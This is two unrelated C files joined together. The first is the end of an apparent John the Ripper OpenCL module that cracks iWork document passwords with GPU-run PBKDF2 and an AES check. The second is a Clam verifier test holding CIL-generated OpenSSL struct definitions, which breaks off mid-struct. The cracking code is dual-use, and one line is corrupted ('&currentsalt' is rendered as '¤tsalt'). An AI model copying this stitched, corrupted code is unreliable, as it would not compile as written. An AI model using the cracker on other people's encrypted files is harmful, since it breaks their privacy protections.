HANDLE_CLERROR(ret_code, "Error creating kernel");
// Initialize openCL tuning (library) for this format.
opencl_init_auto_setup(SEED, 2*HASH_LOOPS, split_events,
warn, 2, self, create_clobj,
release_clobj,
sizeof(pbkdf2_state), 0, db);
// Auto tune execution from shared/included code.
autotune_run(self, 2 * (ITERATIONS - 1) + 4, 0,
(cpu(device_info[gpu_id]) ?
1000000000 : 10000000000ULL));
}
}
static void set_salt(void *salt)
{
cur_salt = (iwork_common_custom_salt*)salt;
/* PBKDF2 */
memcpy((char*)currentsalt.salt, cur_salt->salt, cur_salt->salt_length);
currentsalt.salt_length = cur_salt->salt_length;
currentsalt.iterations = cur_salt->iterations;
/* AES */
memcpy(currentsalt.blob, cur_salt->blob, BLOBLEN);
memcpy(currentsalt.iv, cur_salt->iv, IVLEN);
currentsalt.outlen = 16;
HANDLE_CLERROR(clEnqueueWriteBuffer(queue[gpu_id], mem_salt, CL_FALSE, 0,
sizeof(iwork_salt), ¤tsalt, 0, NULL, NULL), "Copy salt to gpu");
}
static void clear_keys(void)
{
memset(inbuffer, 0, key_buf_size);
}
static void iwork_set_key(char *key, int index)
{
int i;
int length = strlen(key);
for (i = 0; i < length; i++)
((char*)inbuffer)[GETPOS(i, index)] = key[i];
new_keys = 1;
}
static char *get_key(int index)
{
static char ret[PLAINTEXT_LENGTH + 1];
int i = 0;
while (i < PLAINTEXT_LENGTH &&
(ret[i] = ((char*)inbuffer)[GETPOS(i, index)]))
i++;
ret[i] = 0;
return ret;
}
static int crypt_all(int *pcount, struct db_salt *salt)
{
const int count = *pcount;
int i, j;
size_t *lws = local_work_size ? &local_work_size : NULL;
global_work_size = GET_MULTIPLE_OR_BIGGER_VW(count, local_work_size);
// Copy data to gpu
if (ocl_autotune_running || new_keys) {
BENCH_CLERROR(clEnqueueWriteBuffer(queue[gpu_id], mem_in, CL_FALSE, 0, key_buf_size, inbuffer, 0, NULL, multi_profilingEvent[0]), "Copy data to gpu");
new_keys = 0;
}
// Run kernels
BENCH_CLERROR(clEnqueueNDRangeKernel(queue[gpu_id], pbkdf2_init, 1, NULL, &global_work_size, lws, 0, NULL, multi_profilingEvent[1]), "Run initial kernel");
for (j = 0; j < (ocl_autotune_running ? 1 : (currentsalt.outlen + 19) / 20); j++) {
for (i = 0; i < (ocl_autotune_running ? 1 : LOOP_COUNT); i++) {
BENCH_CLERROR(clEnqueueNDRangeKernel(queue[gpu_id], pbkdf2_loop, 1, NULL, &global_work_size, lws, 0, NULL, multi_profilingEvent[2]), "Run loop kernel");
BENCH_CLERROR(clFinish(queue[gpu_id]), "Error running loop kernel");
opencl_process_event();
}
BENCH_CLERROR(clEnqueueNDRangeKernel(queue[gpu_id], iwork_final, 1, NULL, &global_work_size, lws, 0, NULL, multi_profilingEvent[3]), "Run intermediate kernel");
}
// Read the result back
BENCH_CLERROR(clEnqueueReadBuffer(queue[gpu_id], mem_out, CL_TRUE, 0, outsize, output, 0, NULL, multi_profilingEvent[4]), "Copy result back");
return count;
}
static int cmp_all(void *binary, int count)
{
int i;
for (i = 0; i < count; i++)
if (output[i].cracked)
return 1;
return 0;
}
static int cmp_one(void *binary, int index)
{
return (output[index].cracked);
}
static int cmp_exact(char *source, int index)
{
return 1;
}
struct fmt_main fmt_opencl_iwork = {
{
FORMAT_LABEL,
FORMAT_NAME,
ALGORITHM_NAME,
BENCHMARK_COMMENT,
BENCHMARK_LENGTH,
0,
PLAINTEXT_LENGTH,
BINARY_SIZE,
BINARY_ALIGN,
SALT_SIZE,
SALT_ALIGN,
MIN_KEYS_PER_CRYPT,
MAX_KEYS_PER_CRYPT,
FMT_CASE | FMT_8_BIT,
{
"iteration count",
},
{ FORMAT_TAG },
iwork_tests
}, {
init,
done,
reset,
fmt_default_prepare,
iwork_common_valid,
fmt_default_split,
fmt_default_binary,
iwork_common_get_salt,
{
iwork_common_iteration_count,
},
fmt_default_source,
{
fmt_default_binary_hash
},
fmt_default_salt_hash,
NULL,
set_salt,
iwork_set_key,
get_key,
clear_keys,
crypt_all,
{
fmt_default_get_hash
},
cmp_all,
cmp_one,
cmp_exact
}
};
#endif /* plugin stanza */
#endif /* HAVE_OPENCL */
|
the_stack_data/122976.c | // RUN: %clam --turn-undef-nondet --inline --lower-select --devirt-functions=types --lower-unsigned-icmp --crab-print-invariants=false --crab-dom=boxes --crab-check=assert --externalize-addr-taken-functions %opts --crab-sanity-checks "%s" 2>&1 | OutputCheck -l debug %s
// CHECK: ^1 Number of total safe checks$
// CHECK: ^0 Number of total error checks$
// CHECK: ^0 Number of total warning checks$
extern void __VERIFIER_error() __attribute__ ((__noreturn__));
extern void *malloc(unsigned long sz );
extern char __VERIFIER_nondet_char(void);
extern int __VERIFIER_nondet_int(void);
extern long __VERIFIER_nondet_long(void);
extern void *__VERIFIER_nondet_pointer(void);
/* Generated by CIL v. 1.3.6 */
/* print_CIL_Input is true */
extern int __VERIFIER_nondet_int();
typedef unsigned int size_t;
typedef long __time_t;
struct buf_mem_st {
int length ;
char *data ;
int max ;
};
typedef struct buf_mem_st BUF_MEM;
typedef __time_t time_t;
struct stack_st {
int num ;
char **data ;
int sorted ;
int num_alloc ;
int (*comp)(char const * const * , char const * const * ) ;
};
typedef struct stack_st STACK;
struct bio_st;
struct bio_st;
struct crypto_ex_data_st {
STACK *sk ;
int dummy ;
};
typedef struct crypto_ex_data_st CRYPTO_EX_DATA;
typedef struct bio_st BIO;
typedef void bio_info_cb(struct bio_st * , int , char const * , int , long ,
long );
struct bio_method_st {
int type ;
char const *name ;
int (*bwrite)(BIO * , char const * , int ) ;
int (*bread)(BIO * , char * , int ) ;
int (*bputs)(BIO * , char const * ) ;
int (*bgets)(BIO * , char * , int ) ;
long (*ctrl)(BIO * , int , long , void * ) ;
int (*create)(BIO * ) ;
int (*destroy)(BIO * ) ;
long (*callback_ctrl)(BIO * , int , bio_info_cb * ) ;
};
typedef struct bio_method_st BIO_METHOD;
struct bio_st {
BIO_METHOD *method ;
long (*callback)(struct bio_st * , int , char const * , int , long , long ) ;
char *cb_arg ;
int init ;
int shutdown ;
int flags ;
int retry_reason ;
int num ;
void *ptr ;
struct bio_st *next_bio ;
struct bio_st *prev_bio ;
int references ;
unsigned long num_read ;
unsigned long num_write ;
CRYPTO_EX_DATA ex_data ;
};
struct bignum_st {
unsigned long *d ;
int top ;
int dmax ;
int neg ;
int flags ;
};
typedef struct bignum_st BIGNUM;
struct bignum_ctx {
int tos ;
BIGNUM bn[16] ;
int flags ;
int depth ;
int pos[12] ;
int too_many ;
};
typedef struct bignum_ctx BN_CTX;
struct bn_blinding_st {
int init ;
BIGNUM *A ;
BIGNUM *Ai ;
BIGNUM *mod ;
};
typedef struct bn_blinding_st BN_BLINDING;
struct bn_mont_ctx_st {
int ri ;
BIGNUM RR ;
BIGNUM N ;
BIGNUM Ni ;
unsigned long n0 ;
int flags ;
};
typedef struct bn_mont_ctx_st BN_MONT_CTX;
struct X509_algor_st;
struct X509_algor_st;
struct X509_algor_st;
struct asn1_object_st {
char const *sn ;
char const *ln ;
int nid ;
int length ;
unsigned char *data ;
int flags ;
};
typedef struct asn1_object_st ASN1_OBJECT;
struct asn1_string_st {
int length ;
int type ;
unsigned char *data ;
long flags ;
};
typedef struct asn1_string_st ASN1_STRING;
typedef struct asn1_string_st ASN1_INTEGER;
typedef struct asn1_string_st ASN1_ENUMERATED;
typedef struct asn1_string_st ASN1_BIT_STRING;
typedef struct asn1_string_st ASN1_OCTET_STRING;
typedef struct asn1_string_st ASN1_PRINTABLESTRING;
typedef struct asn1_string_st ASN1_T61STRING;
typedef struct asn1_string_st ASN1_IA5STRING;
typedef struct asn1_string_st ASN1_GENERALSTRING;
typedef struct asn1_string_st ASN1_UNIVERSALSTRING;
typedef struct asn1_string_st ASN1_BMPSTRING;
typedef struct asn1_string_st ASN1_UTCTIME;
typedef struct asn1_string_st ASN1_TIME;
typedef struct asn1_string_st ASN1_GENERALIZEDTIME;
typedef struct asn1_string_st ASN1_VISIBLESTRING;
typedef struct asn1_string_st ASN1_UTF8STRING;
typedef int ASN1_BOOLEAN;
union __anonunion_value_19 {
char *ptr ;
ASN1_BOOLEAN boolean ;
ASN1_STRING *asn1_string ;
ASN1_OBJECT *object ;
ASN1_INTEGER *integer ;
ASN1_ENUMERATED *enumerated ;
ASN1_BIT_STRING *bit_string ;
ASN1_OCTET_STRING *octet_string ;
ASN1_PRINTABLESTRING *printablestring ;
ASN1_T61STRING *t61string ;
ASN1_IA5STRING *ia5string ;
ASN1_GENERALSTRING *generalstring ;
ASN1_BMPSTRING *bmpstring ;
ASN1_UNIVERSALSTRING *universalstring ;
ASN1_UTCTIME *utctime ;
ASN1_GENERALIZEDTIME *generalizedtime ;
ASN1_VISIBLESTRING *visiblestring ;
ASN1_UTF8STRING *utf8string ;
ASN1_STRING *set ;
ASN1_STRING *sequence ;
};
struct asn1_type_st {
int type ;
union __anonunion_value_19 value ;
};
typedef struct asn1_type_st ASN1_TYPE;
struct MD5state_st {
unsigned int A ;
unsigned int B ;
unsigned int C ;
unsigned int D ;
unsigned int Nl ;
unsigned int Nh ;
unsigned int data[16] ;
int num ;
};
typedef struct MD5state_st MD5_CTX;
struct SHAstate_st {
unsigned int h0 ;
unsigned int h1 ;
unsigned int h2 ;
unsigned int h3 ;
unsigned int h4 ;
unsigned int Nl ;
unsigned int Nh ;
unsigned int data[16] ;
int num ;
};
typedef struct SHAstate_st SHA_CTX;
struct MD2state_st {
int num ;
unsigned char data[16] ;
unsigned int cksm[16] ;
unsigned int state[16] ;
};
typedef struct MD2state_st MD2_CTX;
struct MD4state_st {
unsigned int A ;
unsigned int B ;
unsigned int C ;
unsigned int D ;
unsigned int Nl ;
unsigned int Nh ;
unsigned int data[16] ;
int num ;
};
typedef struct MD4state_st MD4_CTX;
struct RIPEMD160state_st {
unsigned int A ;
unsigned int B ;
unsigned int C ;
unsigned int D ;
unsigned int E ;
unsigned int Nl ;
unsigned int Nh ;
unsigned int data[16] ;
int num ;
};
typedef struct RIPEMD160state_st RIPEMD160_CTX;
typedef unsigned char des_cblock[8];
union __anonunion_ks_20 {
des_cblock cblock ;
unsigned long deslong[2] ;
};
struct des_ks_struct {
union __anonunion_ks_20 ks ;
int weak_key ;
};
typedef struct des_ks_struct des_key_schedule[16];
struct rc4_key_st {
unsigned int x ;
unsigned int y ;
unsigned int data[256] ;
};
typedef struct rc4_key_st RC4_KEY;
struct rc2_key_st {
unsigned int data[64] ;
};
typedef struct rc2_key_st RC2_KEY;
struct rc5_key_st {
int rounds ;
unsigned long data[34] ;
};
typedef struct rc5_key_st RC5_32_KEY;
struct bf_key_st {
unsigned int P[18] ;
unsigned int S[1024] ;
};
typedef struct bf_key_st BF_KEY;
struct cast_key_st {
unsigned long data[32] ;
int short_key ;
};
typedef struct cast_key_st CAST_KEY;
struct idea_key_st {
unsigned int data[9][6] ;
};
typedef struct idea_key_st IDEA_KEY_SCHEDULE;
struct mdc2_ctx_st {
int num ;
unsigned char data[8] ;
des_cblock h ;
des_cblock hh ;
int pad_type ;
};
typedef struct mdc2_ctx_st MDC2_CTX;
struct rsa_st;
struct rsa_st;
typedef struct rsa_st RSA;
struct rsa_meth_st {
char const *name ;
int (*rsa_pub_enc)(int flen , unsigned char *from , unsigned char *to , RSA *rsa ,
int padding ) ;
int (*rsa_pub_dec)(int flen , unsigned char *from , unsigned char *to , RSA *rsa ,
int padding ) ;
int (*rsa_priv_enc)(int flen , unsigned char *from , unsigned char *to , RSA *rsa ,
int padding ) ;
int (*rsa_priv_dec)(int flen , unsigned char *from , unsigned char *to , RSA *rsa ,
int padding ) ;
int (*rsa_mod_exp)(BIGNUM *r0 , BIGNUM *I , RSA *rsa ) ;
int (*bn_mod_exp)(BIGNUM *r , BIGNUM *a , BIGNUM const *p , BIGNUM const *m ,
BN_CTX *ctx , BN_MONT_CTX *m_ctx ) ;
int (*init)(RSA *rsa ) ;
int (*finish)(RSA *rsa ) ;
int flags ;
char *app_data ;
int (*rsa_sign)(int type , unsigned char *m , unsigned int m_len , unsigned char *sigret ,
unsigned int *siglen , RSA *rsa ) ;
int (*rsa_verify)(int dtype , unsigned char *m , unsigned int m_len , unsigned char *sigbuf ,
unsigned int siglen , RSA *rsa ) ;
};
typedef struct rsa_meth_st RSA_METHOD;
struct rsa_st {
int pad ;
int version ;
RSA_METHOD *meth ;
BIGNUM *n ;
BIGNUM *e ;
BIGNUM *d ;
BIGNUM *p ;
BIGNUM *q ;
BIGNUM *dmp1 ;
BIGNUM *dmq1 ;
BIGNUM *iqmp ;
CRYPTO_EX_DATA ex_data ;
int references ;
int flags ;
BN_MONT_CTX *_method_mod_n ;
BN_MONT_CTX *_method_mod_p ;
BN_MONT_CTX *_method_mod_q ;
char *bignum_data ;
BN_BLINDING *blinding ;
};
struct dh_st;
struct dh_st;
typedef struct dh_st DH;
struct dh_method {
char const *name ;
int (*generate_key)(DH *dh ) ;
int (*compute_key)(unsigned char *key , BIGNUM *pub_key , DH *dh ) ;
int (*bn_mod_exp)(DH *dh , BIGNUM *r , BIGNUM *a , BIGNUM const *p , BIGNUM const *m ,
BN_CTX *ctx , BN_MONT_CTX *m_ctx ) ;
int (*init)(DH *dh ) ;
int (*finish)(DH *dh ) ;
int flags ;
char *app_data ;
};
typedef struct dh_method DH_METHOD;
struct dh_st {
int pad ;
int version ;
BIGNUM *p ;
BIGNUM *g ;
int length ;
BIGNUM *pub_key ;
BIGNUM *priv_key ;
int flags ;
char *method_mont_p ;
BIGNUM *q ;
BIGNUM *j ;
unsigned char *seed ;
int seedlen ;
BIGNUM *counter ;
int references ;
CRYPTO_EX_DATA ex_data ;
DH_METHOD *meth ;
};
struct dsa_st;
struct dsa_st;
typedef struct dsa_st DSA;
struct DSA_SIG_st {
BIGNUM *r ;
BIGNUM *s ;
};
typedef struct DSA_SIG_st DSA_SIG;
struct dsa_method {
char const *name ;
DSA_SIG *(*dsa_do_sign)(unsigned char const *dgst , int dlen , DSA *dsa ) ;
int (*dsa_sign_setup)(DSA *dsa , BN_CTX *ctx_in , BIGNUM **kinvp , BIGNUM **rp ) ;
int (*dsa_do_verify)(unsigned char const *dgst , int dgst_len , DSA_SIG *sig ,
DSA *dsa ) ;
int (*dsa_mod_exp)(DSA *dsa , BIGNUM *rr , BIGNUM *a1 , BIGNUM *p1 , BIGNUM *a2 ,
BIGNUM *p2 , BIGNUM *m , BN_CTX *ctx , BN_MONT_CTX *in_mont ) ;
int (*bn_mod_exp)(DSA *dsa , BIGNUM *r , BIGNUM *a , BIGNUM const *p , BIGNUM const *m ,
BN_CTX *ctx , BN_MONT_CTX *m_ctx ) ;
int (*init)(DSA *dsa ) ;
int (*finish)(DSA *dsa ) ;
int flags ;
char *app_data ;
};
typedef struct dsa_method DSA_METHOD;
struct dsa_st {
int pad ;
int version ;
int write_params ;
BIGNUM *p ;
BIGNUM *q ;
BIGNUM *g ;
BIGNUM *pub_key ;
BIGNUM *priv_key ;
BIGNUM *kinv ;
BIGNUM *r ;
int flags ;
char *method_mont_p ;
int references ;
CRYPTO_EX_DATA ex_data ;
DSA_METHOD *meth ;
};
union __anonunion_pkey_21 {
char *ptr ;
struct rsa_st *rsa ;
struct dsa_st *dsa ;
struct dh_st *dh ;
};
struct evp_pkey_st {
int type ;
int save_type ;
int references ;
union __anonunion_pkey_21 pkey ;
int save_parameters ;
STACK *attributes ;
};
typedef struct evp_pkey_st EVP_PKEY;
struct env_md_st {
int type ;
int pkey_type ;
int md_size ;
void (*init)() ;
void (*update)() ;
void (*final)() ;
int (*sign)() ;
int (*verify)() ;
int required_pkey_type[5] ;
int block_size ;
int ctx_size ;
};
typedef struct env_md_st EVP_MD;
union __anonunion_md_22 {
unsigned char base[4] ;
MD2_CTX md2 ;
MD5_CTX md5 ;
MD4_CTX md4 ;
RIPEMD160_CTX ripemd160 ;
SHA_CTX sha ;
MDC2_CTX mdc2 ;
};
struct env_md_ctx_st {
EVP_MD const *digest ;
union __anonunion_md_22 md ;
};
typedef struct env_md_ctx_st EVP_MD_CTX;
struct evp_cipher_st;
struct evp_cipher_st;
typedef struct evp_cipher_st EVP_CIPHER;
struct evp_cipher_ctx_st;
struct evp_cipher_ctx_st;
typedef struct evp_cipher_ctx_st EVP_CIPHER_CTX;
struct evp_cipher_st {
int nid ;
int block_size ;
int key_len ;
int iv_len ;
unsigned long flags ;
int (*init)(EVP_CIPHER_CTX *ctx , unsigned char const *key , unsigned char const *iv ,
int enc ) ;
int (*do_cipher)(EVP_CIPHER_CTX *ctx , unsigned char *out , unsigned char const *in ,
unsigned int inl ) ;
int (*cleanup)(EVP_CIPHER_CTX * ) ;
int ctx_size ;
int (*set_asn1_parameters)(EVP_CIPHER_CTX * , ASN1_TYPE * ) ;
int (*get_asn1_parameters)(EVP_CIPHER_CTX * , ASN1_TYPE * ) ;
int (*ctrl)(EVP_CIPHER_CTX * , int type , int arg , void *ptr ) ;
void *app_data ;
};
struct __anonstruct_rc4_24 {
unsigned char key[16] ;
RC4_KEY ks ;
};
struct __anonstruct_desx_cbc_25 {
des_key_schedule ks ;
des_cblock inw ;
des_cblock outw ;
};
struct __anonstruct_des_ede_26 {
des_key_schedule ks1 ;
des_key_schedule ks2 ;
des_key_schedule ks3 ;
};
struct __anonstruct_rc2_27 {
int key_bits ;
RC2_KEY ks ;
};
struct __anonstruct_rc5_28 {
int rounds ;
RC5_32_KEY ks ;
};
union __anonunion_c_23 {
struct __anonstruct_rc4_24 rc4 ;
des_key_schedule des_ks ;
struct __anonstruct_desx_cbc_25 desx_cbc ;
struct __anonstruct_des_ede_26 des_ede ;
IDEA_KEY_SCHEDULE idea_ks ;
struct __anonstruct_rc2_27 rc2 ;
struct __anonstruct_rc5_28 rc5 ;
BF_KEY bf_ks ;
CAST_KEY cast_ks ;
};
struct evp_cipher_ctx_st {
EVP_CIPHER const *cipher ;
int encrypt ;
int buf_len ;
unsigned char oiv[8] ;
unsigned char iv[8] ;
unsigned char buf[8] ;
int num ;
void *app_data ;
int key_len ;
union __anonunion_c_23 c ;
};
struct X509_algor_st {
ASN1_OBJECT *algorithm ;
ASN1_TYPE *parameter ;
};
typedef struct X509_algor_st X509_ALGOR;
struct X509_val_st {
ASN1_TIME *notBefore ;
ASN1_TIME *notAfter ;
};
typedef struct X509_val_st X509_VAL;
struct X509_pubkey_st {
X509_ALGOR *algor ;
ASN1_BIT_STRING *public_key ;
EVP_PKEY *pkey ;
};
typedef struct X509_pubkey_st X509_PUBKEY;
struct X509_name_st {
STACK *entries ;
int modified ;
BUF_MEM *bytes ;
unsigned long hash ;
};
typedef struct X509_name_st X509_NAME;
struct x509_cinf_st {
ASN1_INTEGER *version ;
ASN1_INTEGER *serialNumber ;
X509_ALGOR *signature ;
X509_NAME *issuer ;
X509_VAL *validity ;
X509_NAME *subject ;
X509_PUBKEY *key ;
ASN1_BIT_STRING *issuerUID ;
ASN1_BIT_STRING *subjectUID ;
STACK *extensions ;
};
typedef struct x509_cinf_st X509_CINF;
struct x509_cert_aux_st {
STACK *trust ;
STACK *reject ;
ASN1_UTF8STRING *alias ;
ASN1_OCTET_STRING *keyid ;
STACK *other ;
};
typedef struct x509_cert_aux_st X509_CERT_AUX;
struct AUTHORITY_KEYID_st;
struct AUTHORITY_KEYID_st;
struct x509_st {
X509_CINF *cert_info ;
X509_ALGOR *sig_alg ;
ASN1_BIT_STRING *signature ;
int valid ;
int references ;
char *name ;
CRYPTO_EX_DATA ex_data ;
long ex_pathlen ;
unsigned long ex_flags ;
unsigned long ex_kusage ;
unsigned long ex_xkusage ;
unsigned long ex_nscert ;
ASN1_OCTET_STRING *skid ;
struct AUTHORITY_KEYID_st *akid ;
unsigned char sha1_hash[20] ;
X509_CERT_AUX *aux ;
};
typedef struct x509_st X509;
struct lhash_node_st {
void *data ;
struct lhash_node_st *next ;
unsigned long hash ;
};
typedef struct lhash_node_st LHASH_NODE;
struct lhash_st {
LHASH_NODE **b ;
int (*comp)() ;
unsigned long (*hash)() ;
unsigned int num_nodes ;
unsigned int num_alloc_nodes ;
unsigned int p ;
unsigned int pmax ;
unsigned long up_load ;
unsigned long down_load ;
unsigned long num_items ;
unsigned long num_expands ;
unsigned long num_expand_reallocs ;
unsigned long num_contracts ;
unsigned long num_contract_reallocs ;
unsigned long num_hash_calls ;
unsigned long num_comp_calls ;
unsigned long num_insert ;
unsigned long num_replace ;
unsigned long num_delete ;
unsigned long num_no_delete ;
unsigned long num_retrieve ;
unsigned long num_retrieve_miss ;
unsigned long num_hash_comps ;
int error ;
};
struct x509_store_ctx_st;
struct x509_store_ctx_st;
typedef struct x509_store_ctx_st X509_STORE_CTX;
struct x509_store_st {
int cache ;
STACK *objs ;
STACK *get_cert_methods ;
int (*verify)(X509_STORE_CTX *ctx ) ;
int (*verify_cb)(int ok , X509_STORE_CTX *ctx ) ;
CRYPTO_EX_DATA ex_data ;
int references ;
int depth ;
};
typedef struct x509_store_st X509_STORE;
struct x509_store_ctx_st {
X509_STORE *ctx ;
int current_method ;
X509 *cert ;
STACK *untrusted ;
int purpose ;
int trust ;
time_t check_time ;
unsigned long flags ;
void *other_ctx ;
int (*verify)(X509_STORE_CTX *ctx ) ;
int (*verify_cb)(int ok , X509_STORE_CTX *ctx ) ;
int (*get_issuer)(X509 **issuer , X509_STORE_CTX *ctx , X509 *x ) ;
int (*check_issued)(X509_STORE_CTX *ctx , X509 *x , X509 *issuer ) ;
int (*cleanup)(X509_STORE_CTX *ctx ) ;
int depth ;
int valid ;
int last_untrusted ;
STACK *chain ;
int error_depth ;
int error ;
X509 *current_cert ;
X509 *current_issuer ;
CRYPTO_EX_DATA ex_data ;
};
struct comp_method_st {
int type ;
char const *name ;
int (*init)() ;
void (*finish)() ;
int (*compress)() ;
int (*expand)() ;
long (*ctrl)() ;
long (*callback_ctrl)() ;
};
typedef struct comp_method_st COMP_METHOD;
struct comp_ctx_st {
COMP_METHOD *meth ;
unsigned long compress_in ;
unsigned long compress_out ;
unsigned long expand_in ;
unsigned long expand_out ;
CRYPTO_EX_DATA ex_data ;
};
typedef struct comp_ctx_st COMP_CTX;
typedef int pem_password_cb(char *buf , int size , int rwflag , void *userdata );
struct ssl_st;
struct ssl_st;
struct ssl_cipher_st {
int valid ;
char const *name ;
unsigned long id ;
unsigned long algorithms ;
unsigned long algo_strength ;
unsigned long algorithm2 ;
int strength_bits ;
int alg_bits ;
unsigned long mask ;
unsigned long mask_strength ;
};
typedef struct ssl_cipher_st SSL_CIPHER;
typedef struct ssl_st SSL;
struct ssl_ctx_st;
struct ssl_ctx_st;
typedef struct ssl_ctx_st SSL_CTX;
struct ssl3_enc_method;
struct ssl3_enc_method;
struct ssl_method_st {
int version ;
int (*ssl_new)(SSL *s ) ;
void (*ssl_clear)(SSL *s ) ;
void (*ssl_free)(SSL *s ) ;
int (*ssl_accept)(SSL *s ) ;
int (*ssl_connect)(SSL *s ) ;
int (*ssl_read)(SSL *s , void *buf , int len ) ;
int (*ssl_peek)(SSL *s , void *buf , int len ) ;
int (*ssl_write)(SSL *s , void const *buf , int len ) ;
int (*ssl_shutdown)(SSL *s ) ;
int (*ssl_renegotiate)(SSL *s ) ;
int (*ssl_renegotiate_check)(SSL *s ) ;
long (*ssl_ctrl)(SSL *s , int cmd , long larg , char *parg ) ;
long (*ssl_ctx_ctrl)(SSL_CTX *ctx , int cmd , long larg , char *parg ) ;
SSL_CIPHER *(*get_cipher_by_char)(unsigned char const *ptr ) ;
int (*put_cipher_by_char)(SSL_CIPHER const *cipher , unsigned char *ptr ) ;
int (*ssl_pending)(SSL *s ) ;
int (*num_ciphers)(void) ;
SSL_CIPHER *(*get_cipher)(unsigned int ncipher ) ;
struct ssl_method_st *(*get_ssl_method)(int version ) ;
long (*get_timeout)(void) ;
struct ssl3_enc_method *ssl3_enc ;
int (*ssl_version)() ;
long (*ssl_callback_ctrl)(SSL *s , int cb_id , void (*fp)() ) ;
long (*ssl_ctx_callback_ctrl)(SSL_CTX *s , int cb_id , void (*fp)() ) ;
};
typedef struct ssl_method_st SSL_METHOD;
struct sess_cert_st;
struct sess_cert_st;
struct ssl_session_st {
int ssl_version ;
unsigned int key_arg_length ;
unsigned char key_arg[8] ;
int master_key_length ;
unsigned char master_key[48] ;
unsigned int session_id_length ;
unsigned char session_id[32] ;
unsigned int sid_ctx_length ;
unsigned char sid_ctx[32] ;
int not_resumable ;
struct sess_cert_st *sess_cert ;
X509 *peer ;
long verify_result ;
int references ;
long timeout ;
long time ;
int compress_meth ;
SSL_CIPHER *cipher ;
unsigned long cipher_id ;
STACK *ciphers ;
CRYPTO_EX_DATA ex_data ;
struct ssl_session_st *prev ;
struct ssl_session_st *next ;
};
typedef struct ssl_session_st SSL_SESSION;
struct ssl_comp_st {
int id ;
char *name ;
COMP_METHOD *method ;
};
typedef struct ssl_comp_st SSL_COMP;
struct __anonstruct_stats_37 {
int sess_connect ;
int sess_connect_renegotiate ;
int sess_connect_good ;
int sess_accept ;
int sess_accept_renegotiate ;
int sess_accept_good ;
int sess_miss ;
int sess_timeout ;
int sess_cache_full ;
int sess_hit ;
int sess_cb_hit ;
};
struct cert_st;
struct cert_st;
struct ssl_ctx_st {
SSL_METHOD *method ;
unsigned long options ;
unsigned long mode ;
STACK *cipher_list ;
STACK *cipher_list_by_id ;
struct x509_store_st *cert_store ;
struct lhash_st *sessions ;
unsigned long session_cache_size ;
struct ssl_session_st *session_cache_head ;
struct ssl_session_st *session_cache_tail ;
int session_cache_mode ;
long session_timeout ;
int (*new_session_cb)(struct ssl_st *ssl , SSL_SESSION *sess ) ;
void (*remove_session_cb)(struct ssl_ctx_st *ctx , SSL_SESSION *sess ) ;
SSL_SESSION *(*get_session_cb)(struct ssl_st *ssl , unsigned char *data , int len ,
int *copy ) ;
struct __anonstruct_stats_37 stats ;
int references ;
void (*info_callback)() ;
int (*app_verify_callback)() ;
char *app_verify_arg ;
struct cert_st *cert ;
int read_ahead ;
int verify_mode ;
int verify_depth ;
unsigned int sid_ctx_length ;
unsigned char sid_ctx[32] ;
int (*default_verify_callback)(int ok , X509_STORE_CTX *ctx ) ;
int purpose ;
int trust ;
pem_password_cb *default_passwd_callback ;
void *default_passwd_callback_userdata ;
int (*client_cert_cb)() ;
STACK *client_CA ;
int quiet_shutdown ;
CRYPTO_EX_DATA ex_data ;
EVP_MD const *rsa_md5 ;
EVP_MD const *md5 ;
EVP_MD const *sha1 ;
STACK *extra_certs ;
STACK *comp_methods ;
};
struct ssl2_state_st;
struct ssl2_state_st;
struct ssl3_state_st;
struct ssl3_state_st;
struct ssl_st {
int version ;
int type ;
SSL_METHOD *method ;
BIO *rbio ;
BIO *wbio ;
BIO *bbio ;
int rwstate ;
int in_handshake ;
int (*handshake_func)() ;
int server ;
int new_session ;
int quiet_shutdown ;
int shutdown ;
int state ;
int rstate ;
BUF_MEM *init_buf ;
int init_num ;
int init_off ;
unsigned char *packet ;
unsigned int packet_length ;
struct ssl2_state_st *s2 ;
struct ssl3_state_st *s3 ;
int read_ahead ;
int hit ;
int purpose ;
int trust ;
STACK *cipher_list ;
STACK *cipher_list_by_id ;
EVP_CIPHER_CTX *enc_read_ctx ;
EVP_MD const *read_hash ;
COMP_CTX *expand ;
EVP_CIPHER_CTX *enc_write_ctx ;
EVP_MD const *write_hash ;
COMP_CTX *compress ;
struct cert_st *cert ;
unsigned int sid_ctx_length ;
unsigned char sid_ctx[32] ;
SSL_SESSION *session ;
int verify_mode ;
int verify_depth ;
int (*verify_callback)(int ok , X509_STORE_CTX *ctx ) ;
void (*info_callback)() ;
int error ;
int error_code ;
SSL_CTX *ctx ;
int debug ;
long verify_result ;
CRYPTO_EX_DATA ex_data ;
STACK *client_CA ;
int references ;
unsigned long options ;
unsigned long mode ;
int first_packet ;
int client_version ;
};
struct __anonstruct_tmp_38 {
unsigned int conn_id_length ;
unsigned int cert_type ;
unsigned int cert_length ;
unsigned int csl ;
unsigned int clear ;
unsigned int enc ;
unsigned char ccl[32] ;
unsigned int cipher_spec_length ;
unsigned int session_id_length ;
unsigned int clen ;
unsigned int rlen ;
};
struct ssl2_state_st {
int three_byte_header ;
int clear_text ;
int escape ;
int ssl2_rollback ;
unsigned int wnum ;
int wpend_tot ;
unsigned char const *wpend_buf ;
int wpend_off ;
int wpend_len ;
int wpend_ret ;
int rbuf_left ;
int rbuf_offs ;
unsigned char *rbuf ;
unsigned char *wbuf ;
unsigned char *write_ptr ;
unsigned int padding ;
unsigned int rlength ;
int ract_data_length ;
unsigned int wlength ;
int wact_data_length ;
unsigned char *ract_data ;
unsigned char *wact_data ;
unsigned char *mac_data ;
unsigned char *pad_data_UNUSED ;
unsigned char *read_key ;
unsigned char *write_key ;
unsigned int challenge_length ;
unsigned char challenge[32] ;
unsigned int conn_id_length ;
unsigned char conn_id[16] ;
unsigned int key_material_length ;
unsigned char key_material[48] ;
unsigned long read_sequence ;
unsigned long write_sequence ;
struct __anonstruct_tmp_38 tmp ;
};
struct ssl3_record_st {
int type ;
unsigned int length ;
unsigned int off ;
unsigned char *data ;
unsigned char *input ;
unsigned char *comp ;
};
typedef struct ssl3_record_st SSL3_RECORD;
struct ssl3_buffer_st {
unsigned char *buf ;
int offset ;
int left ;
};
typedef struct ssl3_buffer_st SSL3_BUFFER;
struct __anonstruct_tmp_39 {
unsigned char cert_verify_md[72] ;
unsigned char finish_md[72] ;
int finish_md_len ;
unsigned char peer_finish_md[72] ;
int peer_finish_md_len ;
unsigned long message_size ;
int message_type ;
SSL_CIPHER *new_cipher ;
DH *dh ;
int next_state ;
int reuse_message ;
int cert_req ;
int ctype_num ;
char ctype[7] ;
STACK *ca_names ;
int use_rsa_tmp ;
int key_block_length ;
unsigned char *key_block ;
